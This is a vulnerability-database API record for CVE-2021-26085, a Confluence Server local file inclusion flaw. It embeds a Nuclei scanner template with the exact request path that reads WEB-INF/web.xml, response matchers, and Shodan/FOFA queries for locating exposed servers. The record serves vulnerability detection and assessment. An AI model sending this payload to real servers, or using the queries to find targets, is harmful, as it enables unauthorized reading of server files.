{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-26085/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-26085/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-26085/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-26085/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-26085/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-26085"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-26085"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-26085.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2021-26085\n\ninfo:\n  name: Atlassian Confluence Server - Local File Inclusion\n  author: princechaddha\n  severity: medium\n  description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.\n  impact: |\n    An attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage.\n  remediation: |\n    Apply the latest security patches provided by Atlassian to fix the vulnerability.\n  reference:\n    - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html\n    - https://jira.atlassian.com/browse/CONFSERVER-67893\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-26085\n    - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html\n    - https://github.com/e-hakson/OSCP\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2021-26085\n    cwe-id: CWE-425\n    epss-score: 0.99937\n    epss-percentile: 0.9997\n    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: atlassian\n    product: confluence_data_center\n    shodan-query:\n      - http.component:\"Atlassian Confluence\"\n      - http.component:\"atlassian confluence\"\n    fofa-query: app=\"atlassian-confluence\"\n  tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - <display-name>Confluence</display-name>\n          - com.atlassian.confluence.setup.ConfluenceAppConfig\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022017d3bd461d46f45bbcae9d8273272e439dc2dd61161323e8c94e7c72fe19439a022100f5fb6fde77e6ada5d1c7738ffadd33a245433e8b9bb60890aacc3ece20e9a63c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-26085"
}